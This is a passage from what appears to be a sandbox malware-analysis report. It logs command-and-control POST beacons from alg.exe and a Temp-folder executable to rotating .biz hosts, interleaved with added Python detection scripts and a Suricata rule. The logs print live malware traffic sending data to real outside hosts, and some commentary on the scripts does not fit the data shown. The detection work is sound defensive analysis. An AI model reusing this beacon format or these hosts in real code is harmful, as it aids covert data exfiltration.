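    _beacon(115, "54.244.188.177", 1492, r"C:\Windows\System32\alg.exe", "/rsstpsksfhdhf", "rynmcq.biz", 778),
    _beacon(116, "18.208.156.248", 1816, r"C:\Users\user\AppData\Local\Temp\microsofts.exe", "/knaxcyr", "jwkoeoqns.biz", 828),
    {"id": 999, "dst": "203.0.113.10", "dport": 80, "pid": 4242,  # constructed control, not from the report
     "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "request": http_msg("GET /index.html HTTP/1.1", {"Host": "www.example.com", "User-Agent": "Mozilla/5.0 Firefox/131.0"}),
     "response": http_msg("HTTP/1.1 200 OK", {"Content-Type": "text/html", "Content-Length": "13"}, "<html></html>")},
]

if __name__ == "__main__":
    for sid, hits in scan(SESSIONS).items():
        print(sid, hits)
    print(extract_iocs(SESSIONS))
```

Each trait is scored separately so that a single match (a parked .biz domain, or a legitimate WeChat client) does not fire on its own; the three sample beacons hit all six, the control hits none. The process check is the one to keep even when the network traits change: alg.exe has no business originating outbound HTTP, which is exactly what session 115 shows.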


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
117         192.168.2.5  59790        18.246.231.120  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:22.847208023 CET  353                OUT        POST /ivdmudcsfvhy HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: xccjj.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Nov 5, 2024 17:04:22.847224951 CET  828                OUT        Data Raw: 8b 01 91 78 b1 29 82 a8 30 03 00 00 35 ed 6d be 67 dd aa 6b df 37 3b 2a 89 dd 7d 1d 0f 07 a4 30 5c ca ff 6c bb f0 39 08 13 87 ca a6 f5 ec 51 67 ec b9 53 7e 1f 0f 5c ad b8 14 86 af 90 1f c3 6b 65 83 ea e3 30 dd 58 fd be d8 4f 2f 95 49 7a 03 b8 f2
Nov 5, 2024 17:04:23.684005976 CET  413                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:23 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=9ea734ac212b8968377cb7bdba6aa724|173.254.250.76|1730822663|1730822663|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
118         192.168.2.5  59791        3.254.94.185    80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:22.880805969 CET  355                OUT        POST /ydpeotimwcfnew HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: uaafd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 5, 2024 17:04:22.880831003 CET  778                OUT        Data Raw: d9 66 53 c2 02 04 69 eb fe 02 00 00 51 b8 99 9a d7 e3 fd f1 49 b0 25 d6 a5 60 77 e1 8b 3f 5b ba 0c 51 22 45 0a 5b fe 51 4e c9 f9 2c ff 95 b6 b5 4c 4e 47 90 87 8c ce 01 53 bc b1 f2 49 a2 9e 38 d8 d3 0d 6a bd 2b e2 54 d8 75 56 6d 58 cf 7b 2e 06 08
Nov 5, 2024 17:04:23.848691940 CET  413                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:23 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=1dcba9b99a788c42e12d3cfc530eb1ce|173.254.250.76|1730822663|1730822663|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
119         192.168.2.5  59792        44.221.84.105   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:23.716886997 CET  350                OUT        POST /tssrdd HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: hehckyov.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Nov 5, 2024 17:04:23.716886997 CET  828                OUT        Data Raw: 65 ee d5 0c 58 91 ba 2c 30 03 00 00 d2 02 ae 07 04 47 d6 15 f3 ac ee f5 9d fe a9 6f 92 b4 8c e1 36 e3 bb ab ad 1b b7 f5 46 42 3a 59 7a 08 7d 14 88 1f 67 3d 19 82 d4 4b 6d 64 a2 64 55 9c 63 26 e0 ce 26 4a 16 dd 5b 84 00 e5 2f 2b 8c 93 b9 64 51 ef
Nov 5, 2024 17:04:24.368329048 CET  416                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:24 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=19a0b567a2753f447df06dd9f6812a37|173.254.250.76|1730822664|1730822664|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
120         192.168.2.5  59793        18.141.10.107   80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:24.188321114 CET  357                OUT        POST /nhvixgstciqyn HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: eufxebus.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 5, 2024 17:04:24.188321114 CET  778                OUT        Data Raw: e1 62 91 1d a4 3c da fd fe 02 00 00 82 a9 ee f4 76 a9 d7 66 e3 e3 37 39 51 88 fc 80 2e 8d 8f 6d 12 f2 04 7f e3 2e 3f 03 f3 86 71 4b 2a f0 7f 67 cf dd b5 4b 96 dc c7 e3 49 b6 dd d3 a8 ce f4 c1 db 88 73 7a 6d 41 4b 95 22 b8 56 d9 27 08 de 92 33 27
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b<vf79Q.m.?qK*gKIszmAK"V'3'OToDdL/~zj-#L'AFm"[R'K'W7jAI rg;rR6h\g$0'_!eEx=HVwKK8XklPqY=
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.618566036 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=64d8616bada04f9cb183e2132bfc4534|173.254.250.76|1730822665|1730822665|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 59794 | 54.244.188.177 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:24.563165903 CET | 351 | OUT | POST /lameuyxyl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:24.563256979 CET | 828 | OUT | Data Raw: 58 d4 5c 7b e7 7a af f3 30 03 00 00 d1 df 1a cc 0f 88 0f d0 16 5c 44 35 9b d9 34 f2 45 a2 8e 98 75 d3 ca a9 04 07 a5 0f c2 84 1b ae 03 e1 37 3e c6 10 2c e6 42 9d a0 fb a6 2f 37 fc aa 13 49 20 81 f2 a7 4b 77 7c 45 ce 92 be 28 03 97 9c da 47 03 57
Data Ascii: X\{z0\D54Eu7>,B/7I Kw|E(GW;x]TY%wFmCXer^`6wNu sieLWwh*v>30m;#~/>%Z_\D\AL9sIzzC8;G6(qBEQg2b&won~klC{mE
Nov 5, 2024 17:04:25.399157047 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5655fddbe187add045d59ab0b0ff25f6|173.254.250.76|1730822665|1730822665|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.5 | 59795 | 3.254.94.185 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:25.435960054 CET | 354 | OUT | POST /qcgjfxceqsgou HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:25.435997963 CET | 828 | OUT | Data Raw: bc 74 45 d6 45 ff 6f 3b 30 03 00 00 a1 0c f3 f6 d5 f8 81 bb c3 49 79 f2 d1 d0 69 ee 8b 7e ae d0 4a 3a 63 08 d3 a8 cd 7a 38 3b c9 10 a3 a5 fe 07 be 8d 77 1b 72 ff d8 2f e4 1d fe d4 2d 4d 5e c2 da 1b 9c 4b 99 09 68 19 ab 94 8f d3 b4 f1 7c 9f 74 a0
Data Ascii: tEEo;0Iyi~J:cz8;wr/-M^Kh|tBKqu'vXf?RRE]a^@#9 <LX/"p<.*076tQ:nP'X:8gn|IK7}g@`'{NqKY
Nov 5, 2024 17:04:26.437732935 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f99f5331876d321b7f9964f8d48b2830|173.254.250.76|1730822666|1730822666|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
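
The four POST beacons in sessions 120 to 123 share a shape that is worth checking mechanically rather than by eye: a POST to a short all-lowercase path on a .biz host, the same WeChat/QQBrowser User-Agent on every request, a response that is an empty chunked body with a btst cookie, and a request body whose bytes 8 to 11, read as a little-endian 32-bit integer, equal Content-Length minus 12 in every captured request (0x2fe = 766 for the 778-byte bodies, 0x330 = 816 for the 828-byte ones). The script below is an added example and is not part of the Joe Sandbox report or of the sample's own code. The 12-byte header layout it assumes (an 8-byte prefix that differs per request, then a length field) is inferred from these four requests only; the sample records are copied from the Data Raw rows above with the hex truncated to the first 12 bytes, and the indicator names are the author's own.

```python
import re
import struct

# Constructed sample: the four beacons from sessions 120-123 as
# (host, path, Content-Length, first 12 body bytes as hex). The hex
# prefixes are copied from the report's "Data Raw" rows; the rest of
# each body is omitted because the report truncates it anyway.
SAMPLE_BEACONS = [
    ("eufxebus.biz", "/nhvixgstciqyn", 778, "e1 62 91 1d a4 3c da fd fe 02 00 00"),
    ("rynmcq.biz",   "/lameuyxyl",     828, "58 d4 5c 7b e7 7a af f3 30 03 00 00"),
    ("uaafd.biz",    "/qcgjfxceqsgou", 828, "bc 74 45 d6 45 ff 6f 3b 30 03 00 00"),
    ("pwlqfu.biz",   "/tfuhaffhj",     778, "7f 39 4a 4b dd d8 80 ac fe 02 00 00"),
]

# The User-Agent string every captured request carries, verbatim.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)

# Paths in the capture are 9-13 lowercase letters with no extension or query.
RANDOM_PATH = re.compile(r"^/[a-z]{8,16}$")

# Assumption (not stated in the report): 8-byte prefix + uint32 LE length.
HEADER_LEN = 12


def parse_body_header(hex_prefix):
    """Split the first 12 body bytes into (prefix, payload_len).

    payload_len is bytes 8..11 as little-endian uint32; in all four captured
    requests it equals Content-Length - 12, which is what makes it a usable
    structural indicator even though the rest of the body is opaque.
    """
    raw = bytes.fromhex(hex_prefix.replace(" ", ""))
    if len(raw) < HEADER_LEN:
        raise ValueError("need at least %d body bytes" % HEADER_LEN)
    prefix = raw[:8]
    (payload_len,) = struct.unpack("<I", raw[8:12])
    return prefix, payload_len


def score_beacon(host, path, content_length, hex_prefix, user_agent=BEACON_UA):
    """Return the list of indicator names this request matches (empty if none)."""
    hits = []
    if RANDOM_PATH.match(path):
        hits.append("random-lowercase-path")
    if host.endswith(".biz"):
        hits.append("biz-tld")
    if user_agent == BEACON_UA:
        hits.append("fixed-wechat-ua")
    _, payload_len = parse_body_header(hex_prefix)
    if payload_len == content_length - HEADER_LEN:
        hits.append("length-field-matches-body")
    return hits


def check_all(beacons=SAMPLE_BEACONS):
    """Score every sample beacon; returns {host: [indicators]}."""
    return {host: score_beacon(host, path, n, hx) for host, path, n, hx in beacons}


if __name__ == "__main__":
    for host, hits in check_all().items():
        print("%-14s %s" % (host, ", ".join(hits)))
```

On real traffic the body check is the one to lean on: the .biz TLD and the random path are cheap for the operator to change, and the User-Agent is a fixed string that any Suricata or Zeek rule can already match, but a length field that must equal Content-Length minus 12 is a structural property of the client and survives domain rotation. Treat the header layout as a hypothesis until more samples confirm it; four requests is enough to notice the pattern, not to prove it.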


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.5 | 59796 | 34.246.200.160 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:25.953444958 CET | 351 | OUT | POST /tfuhaffhj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:25.953444958 CET | 778 | OUT | Data Raw: 7f 39 4a 4b dd d8 80 ac fe 02 00 00 88 48 d8 10 73 90 16 05 e0 93 bc 2e d7 51 49 02 00 41 9c 2a a3 29 a6 12 09 02 b1 ec 7f 24 cc 78 c7 80 b4 43 c1 a1 d9 c2 3d 60 9b b9 94 b0 06 7f 25 4d 4c dc 03 5b 2e 67 fd 4d 00 15 cd 8b b2 5b bc 51 e3 9b 74 24
Data Ascii: 9JKHs.QIA*)$xC=`%ML[.gM[Qt$R!$M0dH[ni}Dbq`Kw"U$Kx!H5P3Jw4`yo=:\2*HCh<r8FDRJZ+~~~
Nov 5, 2024 17:04:26.924432039 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fe1ecc6c3d60dc0c4d30c425d779fbc2|173.254.250.76|1730822666|1730822666|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.5 | 59797 | 18.141.10.107 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:26.463238955 CET | 346 | OUT | POST /fx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: eufxebus.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:26.463326931 CET | 828 | OUT | Data Raw: d1 f0 a0 54 22 6b 21 3a 30 03 00 00 c2 76 28 27 b3 86 0a 25 9e e0 d2 94 22 35 11 c2 9c f6 d4 38 36 87 ed 24 7a 0e ac 4f 3a 1c bc 00 36 81 50 49 fe 85 93 0e f9 2e e8 06 4e d8 e5 36 ef 92 1e e8 21 ec 7c 32 ce df 38 d8 b0 03 b6 6f 3b d2 2b 04 42 ad
    Data Ascii: T"k!:0v('%"586$zO:6PI.N6!|28o;+BnEOFY]Ps.\2XnV%fAc|,=pl9$sJiZH[6uhe9yl6w'^K=C{w/#S=l'W(*cEgD
Nov 5, 2024 17:04:27.953049898 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:27 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=56030c0a05205bef4a83c2da70f6becb|173.254.250.76|1730822667|1730822667|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.5 | 59799 | 47.129.31.212 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:27.307653904 CET | 351 | OUT | POST /tmdyfv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rrqafepng.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:27.307653904 CET | 778 | OUT | Data Raw: 51 57 03 7b 8e 12 bd cb fe 02 00 00 7f cb 18 52 92 a6 0a cd 4c bc 7d e3 4c 7b b0 a6 24 cb 62 eb 1a 69 84 37 b9 a3 02 e5 90 9c 02 af 3f 3e df b2 ee 8b f0 c4 0b f3 bd 00 83 27 51 47 e8 4c 1a f6 d0 5e 8b 8a 9d ee bf 4c ae 29 56 f5 bf 4c 91 d2 05 df
    Data Ascii: QW{RL}L{$bi7?>'QGL^L)VLiuR;.`+"8 i&AcYY;~r*c[+rDt[oJ{P*bsmV0MUm8Ht~$Ks-$.Wc^x>WW=?26y[kf{
Nov 5, 2024 17:04:28.759972095 CET | 417 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=41ec5cac6ced2d29e82b0974df9ccda7|173.254.250.76|1730822668|1730822668|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
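The sessions above all share one shape: a POST from a non-browser process to a short lowercase path on a .biz host, a fixed WindowsWechat/QQBrowser User-Agent, Pragma and Cache-Control set to no-cache, no Content-Type or Accept header, an opaque binary body, and a 200 OK reply whose chunked body is empty ("0\r\n\r\n") but sets btst/snkz cookies. The following Python is an added triage example, not part of the Joe Sandbox report and not the malware's own code: it re-parses session 125 exactly as printed above, scores the request against those traits, recognises the empty chunked reply, and emits a Suricata rule for the User-Agent plus path shape. One check is an inference rather than documented behaviour: in all four bodies on this page, bytes 8-11 are a little-endian integer equal to Content-Length minus 12 (0x02fe = 766 = 778 - 12, 0x0330 = 816 = 828 - 12), so the code treats the first 12 bytes as a header carrying a payload length; the function names and the rule's sid are mine.

```python
"""Triage helpers for the HTTP beacons captured in this report (added example)."""
import re
import struct

# Exact User-Agent string from every request in the report.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

# Session 125 (alg.exe -> rrqafepng.biz), copied from the report. The sandbox only
# prints the first bytes of the body, so the body prefix is what is available and the
# length check relies on the Content-Length header rather than len(body).
REQUEST_125 = (
    "POST /tmdyfv HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "Host: rrqafepng.biz\r\n"
    f"User-Agent: {BEACON_UA}\r\n"
    "Content-Length: 778\r\n"
    "\r\n"
)
BODY_PREFIX_125 = bytes.fromhex(
    "51 57 03 7b 8e 12 bd cb fe 02 00 00 7f cb 18 52 92 a6 0a cd 4c bc 7d e3"
)
RESPONSE_125 = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Date: Tue, 05 Nov 2024 16:04:28 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Connection: close\r\n"
    "Set-Cookie: btst=41ec5cac6ced2d29e82b0974df9ccda7|173.254.250.76|1730822668|1730822668|0|1|0; "
    "path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;\r\n"
    "Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT\r\n"
    "\r\n"
    "0\r\n\r\n"
)


def parse_http(text):
    """Split an HTTP/1.1 message into (start line, {lowercased header: value}, body)."""
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def body_length_field(body_prefix):
    """Little-endian uint32 at offset 8; inferred 12-byte header, see lead-in."""
    return struct.unpack_from("<I", body_prefix, 8)[0]


def beacon_indicators(request_text, body_prefix):
    """List the traits this request shares with the report's beacon POSTs."""
    start, headers, _ = parse_http(request_text)
    method, path, _ = start.split(" ", 2)
    hits = []
    if method == "POST" and re.fullmatch(r"/[a-z]{1,8}", path):
        hits.append("POST to short lowercase path")
    if headers.get("host", "").endswith(".biz"):
        hits.append("Host under .biz")
    if headers.get("user-agent") == BEACON_UA:
        hits.append("exact WindowsWechat/QQBrowser User-Agent")
    if headers.get("pragma") == "no-cache" and headers.get("cache-control") == "no-cache":
        hits.append("Pragma and Cache-Control no-cache")
    if method == "POST" and "content-type" not in headers and "accept" not in headers:
        hits.append("POST without Content-Type or Accept")
    declared = int(headers.get("content-length", "0"))
    if len(body_prefix) >= 12 and body_length_field(body_prefix) == declared - 12:
        hits.append("body[8:12] == Content-Length - 12 (inferred framing)")
    return hits


def is_empty_chunked_200(response_text):
    """True for the '200 OK, chunked, zero-length body' reply seen in every session."""
    start, headers, body = parse_http(response_text)
    return (start.startswith("HTTP/1.1 200")
            and headers.get("transfer-encoding", "").lower() == "chunked"
            and body == "0\r\n\r\n")


def suricata_rule(sid):
    """Suricata 5+ rule keyed on the User-Agent fragment and the path shape."""
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any ('
        'msg:"POST beacon with WindowsWechat QQBrowser User-Agent"; flow:established,to_server; '
        'http.method; content:"POST"; '
        'http.user_agent; content:"MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat"; '
        'http.uri; pcre:"/^\\/[a-z]{1,8}$/"; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    for hit in beacon_indicators(REQUEST_125, BODY_PREFIX_125):
        print("-", hit)
    print("empty chunked 200:", is_empty_chunked_200(RESPONSE_125))
    print(suricata_rule(1000001))
```

The User-Agent is the strongest single pivot because it is byte-identical across all hosts and both processes; the path regex and .biz check on their own would also match legitimate traffic, so they are scored rather than alerted on alone. Treat the 12-byte header inference as a hypothesis to confirm against a full body capture before building detection on it.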


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.5 | 59800 | 34.246.200.160 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:27.981580019 CET | 344 | OUT | POST /yk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pwlqfu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:27.981599092 CET | 828 | OUT | Data Raw: 51 1b 4e 2e 90 13 81 87 30 03 00 00 3e d2 03 19 b6 06 5a 47 99 29 36 60 b3 f9 ca 17 a8 53 77 ed 42 ad ee 29 7e 09 9d 22 71 27 f0 da 29 5b 7f 9b fb e0 ff bf 83 43 bc 7e 55 96 c0 b1 29 7b c4 4f 51 01 25 05 e6 04 21 45 15 e7 6d 12 f8 d9 1e 59 97 ee
    Data Ascii: QN.0>ZG)6`SwB)~"q')[C~U){OQ%!EmYE}s\xIh De`D!04!mhEt! v~y_iY=yTmFT;9*N|oR"yW}UGE*,7Kr<h<h>Pr'UO
Nov 5, 2024 17:04:28.954812050 CET | 414 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=23bcb80dd1895a4c1004918c527deb09|173.254.250.76|1730822668|1730822668|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
